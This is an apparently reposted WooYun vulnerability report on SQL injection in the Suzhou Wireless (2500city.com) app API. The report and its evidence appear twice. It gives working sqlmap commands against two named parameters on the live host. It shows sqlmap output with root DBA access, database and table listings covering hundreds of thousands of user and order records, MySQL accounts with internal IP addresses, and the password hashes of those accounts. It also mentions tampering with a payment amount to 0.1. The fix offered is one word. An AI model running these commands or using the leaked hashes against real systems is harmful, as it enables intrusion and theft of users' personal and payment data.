苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

admin
admin
admin
140559
文章
117
评论
2017年5月2日07:43:10评论398 views字数 245阅读0分49秒阅读模式
摘要

2016-05-13: 细节已通知厂商并且等待厂商处理中
2016-05-13: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-18: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2016-208092

漏洞标题: 苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

相关厂商: wisesz.com

漏洞作者: 黑色键盘丶

提交时间: 2016-05-13 12:16

公开时间: 2016-05-18 12:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

1人收藏

漏洞详情

披露状态:

2016-05-13: 细节已通知厂商并且等待厂商处理中
2016-05-13: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域 
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
 =2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
 rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
 ---------------------------------------------------------------------------------
 sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
 690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
 ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs

数据库信息

code 区域 
available databases [21]:
 [*] bike
 [*] information_schema
 [*] mysql
 [*] news_stat
 [*] palau_core
 [*] statistic
 [*] sztv
 [*] sztv_baoliaodb
 [*] sztv_busdb
 [*] sztv_coachdb
 [*] sztv_mcenterdb
 [*] sztv_newsdb
 [*] sztv_paydb
 [*] sztv_statdb
 [*] sztv_subwaydb
 [*] sztv_systemdb
 [*] sztv_taxidb
 [*] sztv_ucenterdb
 [*] sztv_urecorddb
 [*] sztv_weatherdb
 [*] sztv_webdb
code 区域 
dba权限垮裤查询
 83w用户信息+57w订单
 Database: sztv_ucenterdb
 +--------------------+---------+
 | Table              | Entries |
 +--------------------+---------+
 | `user`             | 830469  |
 | order_info         | 574954  |
 | credit_log         | 395133  |
 | user_currency      | 364474  |
 | currency_log       | 364351  |
 | credit             | 257099  |
 | login_log          | 197593  |
 | sms_user           | 46552   |
 | account_log        | 19755   |
 | user_account       | 19700   |
 | mobile             | 6849    |
 | smsverify_log      | 2463    |
 | refundorder        | 927     |
 | invitelog          | 584     |
 | event_2016050401_1 | 223     |
 | blacklist          | 176     |
 | credit_rule        | 7       |
 | product_notice     | 7       |
 | user_addr          | 2       |
 | smsverify          | 1       |
 +--------------------+---------+
code 区域 
Database: sztv_paydb
 +---------------+---------+
 | Table         | Entries |
 +---------------+---------+
 | action_order  | 29872   |
 | action_draw   | 1901    |
 | action_draw_1 | 1457    |
 | `action`      | 14      |
 +---------------+---------+
 
 Database: palau_core
 +---------------+---------+
 | Table         | Entries |
 +---------------+---------+
 | user_passport | 788284  |
 | user_profile  | 787466  |
 | user_secret   | 787465  |
 | application   | 6       |
 | client        | 2       |
 | client_app    | 2       |
 +---------------+---------+
 
 Database: sztv_coachdb
 +--------------------+---------+
 | Table              | Entries |
 +--------------------+---------+
 | `order`            | 434727  |
 | `user`             | 138878  |
 | email              | 6674    |
 | stat_email_deliver | 2661    |
 | t                  | 21      |
 +--------------------+---------+
 Database: bike
 +---------------------+---------+
 | Table               | Entries |
 +---------------------+---------+
 | pm25                | 53629405 |
 | bike_statistics     | 11931902 |
 | vote_record         | 2266953 |
 | booklog             | 275523  |
 | car_price           | 82911   |
 | linestationinfo     | 28996   |
 | survey_addedoption  | 20785   |
 | busstationinfo      | 20199   |
 | bike_badwords       | 20142   |
 | bike_busstation     | 19743   |
 | survey_action       | 19478   |
 | survey_answers      | 16275   |
 | busstation          | 8371    |
 | xunbao_user         | 3788    |
 | bike_station_copy   | 2552    |
 | ct_log              | 2389    |
 | skin_icon           | 1232    |
 | bike_station        | 1163    |
 | linestation         | 905     |
 | vote_info           | 789     |
 | survey_option       | 621     |
 | bike_splashimg      | 597     |
 | bookiphone          | 308     |
 | gravity             | 205     |
 | survey_title        | 162     |
 | bike_linestation    | 129     |
 | ct_option           | 128     |
 | bike_trainstation   | 125     |
 | temp_apply          | 115     |
 | bike_mood           | 102     |
 | vote_candidate      | 102     |
 | skin_background     | 80      |
 | xunbao_temp         | 51      |
 | ct_page             | 47      |
 | ct_title            | 46      |
 | temp_apply1         | 46      |
 | bookandroid         | 40      |
 | survey_page         | 30      |
 | survey_candidate    | 24      |
 | vote_information    | 20      |
 | temp_apply2         | 18      |
 | book                | 15      |
 | bike_city           | 13      |
 | apps_recommend_copy | 12      |
 | temp_dhsz12         | 12      |
 | bike_stationnews    | 11      |
 | apps_recommend      | 10      |
 | survey_voteinfo     | 9       |
 | taxi_landmark       | 9       |
 | bookImg             | 8       |
 | bike_line           | 4       |
 | skin_program        | 4       |
 | survey_vote         | 4       |
 | survey_awardtimes   | 3       |
 | sztv_ad             | 2       |
 | bike_admin          | 1       |
 +---------------------+---------+
code 区域 
[02:37:40] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 5.3.29
 back-end DBMS: MySQL 5.0
 [02:37:40] [INFO] testing if current user is DBA
 [02:37:40] [INFO] fetching current user
 [02:37:40] [INFO] resumed: root@%
 current user is DBA:    True
 [02:37:40] [INFO] fetching database users
 [02:37:40] [INFO] the SQL query used returns 282 ent
 database management system users [22]:
 [*] 'backup'@'192.168.50.50'
 [*] 'bakdb'@'%'
 [*] 'bakdb'@'192.168.50.89'
 [*] 'bakup'@'192.168.50.89'
 [*] 'chaxun'@'%'
 [*] 'cloud'@'%'
 [*] 'dbbak'@'192.168.50.89'
 [*] 'dbbak'@'localhost'
 [*] 'debian-sys-maint'@'localhost'
 [*] 'jeecn'@'localhost'
 [*] 'jiankongbao'@'60.195.252.106'
 [*] 'jiankongbao'@'60.195.252.107'
 [*] 'reader'@'%'
 [*] 'root'@'%'
 [*] 'root'@'127.0.0.1'
 [*] 'root'@'192.168.50.177'
 [*] 'root'@'192.168.50.20'
 [*] 'root'@'192.168.50.40'
 [*] 'root'@'192.168.50.60'
 [*] 'root'@'192.168.50.74'
 [*] 'root'@'localhost'
 [*] 'txq'@'%'
 
 eb application technology: PHP 5.3.29
 back-end DBMS: MySQL 5.0
 database management system users password hashes:
 [*] backup [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] bakdb [2]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
     password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
 [*] bakup [1]:
     password hash: *A116AE5F665BF5F27292C069082E763E023D597B
 [*] chaxun [1]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
 [*] cloud [1]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
 [*] dbbak [2]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
 [*] debian-sys-maint [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] jeecn [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] jiankongbao [2]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
 [*] reader [1]:
     password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
 [*] root [3]:
     password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
 [*] txq [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC

这里一个支付的不知道是不是

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

抓包

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

修改为0.1

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

漏洞证明:

code 区域 
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
 =2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
 rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
 ---------------------------------------------------------------------------------
 sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
 690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
 ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs

数据库信息

code 区域 
available databases [21]:
 [*] bike
 [*] information_schema
 [*] mysql
 [*] news_stat
 [*] palau_core
 [*] statistic
 [*] sztv
 [*] sztv_baoliaodb
 [*] sztv_busdb
 [*] sztv_coachdb
 [*] sztv_mcenterdb
 [*] sztv_newsdb
 [*] sztv_paydb
 [*] sztv_statdb
 [*] sztv_subwaydb
 [*] sztv_systemdb
 [*] sztv_taxidb
 [*] sztv_ucenterdb
 [*] sztv_urecorddb
 [*] sztv_weatherdb
 [*] sztv_webdb
code 区域 
dba权限垮裤查询
 83w用户信息+57w订单
 Database: sztv_ucenterdb
 +--------------------+---------+
 | Table              | Entries |
 +--------------------+---------+
 | `user`             | 830469  |
 | order_info         | 574954  |
 | credit_log         | 395133  |
 | user_currency      | 364474  |
 | currency_log       | 364351  |
 | credit             | 257099  |
 | login_log          | 197593  |
 | sms_user           | 46552   |
 | account_log        | 19755   |
 | user_account       | 19700   |
 | mobile             | 6849    |
 | smsverify_log      | 2463    |
 | refundorder        | 927     |
 | invitelog          | 584     |
 | event_2016050401_1 | 223     |
 | blacklist          | 176     |
 | credit_rule        | 7       |
 | product_notice     | 7       |
 | user_addr          | 2       |
 | smsverify          | 1       |
 +--------------------+---------+
code 区域 
Database: sztv_paydb
 +---------------+---------+
 | Table         | Entries |
 +---------------+---------+
 | action_order  | 29872   |
 | action_draw   | 1901    |
 | action_draw_1 | 1457    |
 | `action`      | 14      |
 +---------------+---------+
 
 Database: palau_core
 +---------------+---------+
 | Table         | Entries |
 +---------------+---------+
 | user_passport | 788284  |
 | user_profile  | 787466  |
 | user_secret   | 787465  |
 | application   | 6       |
 | client        | 2       |
 | client_app    | 2       |
 +---------------+---------+
 
 Database: sztv_coachdb
 +--------------------+---------+
 | Table              | Entries |
 +--------------------+---------+
 | `order`            | 434727  |
 | `user`             | 138878  |
 | email              | 6674    |
 | stat_email_deliver | 2661    |
 | t                  | 21      |
 +--------------------+---------+
 Database: bike
 +---------------------+---------+
 | Table               | Entries |
 +---------------------+---------+
 | pm25                | 53629405 |
 | bike_statistics     | 11931902 |
 | vote_record         | 2266953 |
 | booklog             | 275523  |
 | car_price           | 82911   |
 | linestationinfo     | 28996   |
 | survey_addedoption  | 20785   |
 | busstationinfo      | 20199   |
 | bike_badwords       | 20142   |
 | bike_busstation     | 19743   |
 | survey_action       | 19478   |
 | survey_answers      | 16275   |
 | busstation          | 8371    |
 | xunbao_user         | 3788    |
 | bike_station_copy   | 2552    |
 | ct_log              | 2389    |
 | skin_icon           | 1232    |
 | bike_station        | 1163    |
 | linestation         | 905     |
 | vote_info           | 789     |
 | survey_option       | 621     |
 | bike_splashimg      | 597     |
 | bookiphone          | 308     |
 | gravity             | 205     |
 | survey_title        | 162     |
 | bike_linestation    | 129     |
 | ct_option           | 128     |
 | bike_trainstation   | 125     |
 | temp_apply          | 115     |
 | bike_mood           | 102     |
 | vote_candidate      | 102     |
 | skin_background     | 80      |
 | xunbao_temp         | 51      |
 | ct_page             | 47      |
 | ct_title            | 46      |
 | temp_apply1         | 46      |
 | bookandroid         | 40      |
 | survey_page         | 30      |
 | survey_candidate    | 24      |
 | vote_information    | 20      |
 | temp_apply2         | 18      |
 | book                | 15      |
 | bike_city           | 13      |
 | apps_recommend_copy | 12      |
 | temp_dhsz12         | 12      |
 | bike_stationnews    | 11      |
 | apps_recommend      | 10      |
 | survey_voteinfo     | 9       |
 | taxi_landmark       | 9       |
 | bookImg             | 8       |
 | bike_line           | 4       |
 | skin_program        | 4       |
 | survey_vote         | 4       |
 | survey_awardtimes   | 3       |
 | sztv_ad             | 2       |
 | bike_admin          | 1       |
 +---------------------+---------+
code 区域 
[02:37:40] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 5.3.29
 back-end DBMS: MySQL 5.0
 [02:37:40] [INFO] testing if current user is DBA
 [02:37:40] [INFO] fetching current user
 [02:37:40] [INFO] resumed: root@%
 current user is DBA:    True
 [02:37:40] [INFO] fetching database users
 [02:37:40] [INFO] the SQL query used returns 282 ent
 database management system users [22]:
 [*] 'backup'@'192.168.50.50'
 [*] 'bakdb'@'%'
 [*] 'bakdb'@'192.168.50.89'
 [*] 'bakup'@'192.168.50.89'
 [*] 'chaxun'@'%'
 [*] 'cloud'@'%'
 [*] 'dbbak'@'192.168.50.89'
 [*] 'dbbak'@'localhost'
 [*] 'debian-sys-maint'@'localhost'
 [*] 'jeecn'@'localhost'
 [*] 'jiankongbao'@'60.195.252.106'
 [*] 'jiankongbao'@'60.195.252.107'
 [*] 'reader'@'%'
 [*] 'root'@'%'
 [*] 'root'@'127.0.0.1'
 [*] 'root'@'192.168.50.177'
 [*] 'root'@'192.168.50.20'
 [*] 'root'@'192.168.50.40'
 [*] 'root'@'192.168.50.60'
 [*] 'root'@'192.168.50.74'
 [*] 'root'@'localhost'
 [*] 'txq'@'%'
 
 eb application technology: PHP 5.3.29
 back-end DBMS: MySQL 5.0
 database management system users password hashes:
 [*] backup [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] bakdb [2]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
     password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
 [*] bakup [1]:
     password hash: *A116AE5F665BF5F27292C069082E763E023D597B
 [*] chaxun [1]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
 [*] cloud [1]:
     password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
 [*] dbbak [2]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
 [*] debian-sys-maint [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] jeecn [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
 [*] jiankongbao [2]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
 [*] reader [1]:
     password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
 [*] root [3]:
     password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
     password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
 [*] txq [1]:
     password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC

这里一个支付的不知道是不是

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

抓包

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

修改为0.1

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-18 12:20

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-13 12:24 | Mazing ( 路人 | Rank:27 漏洞数:7 )

    0

    键盘表哥666

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin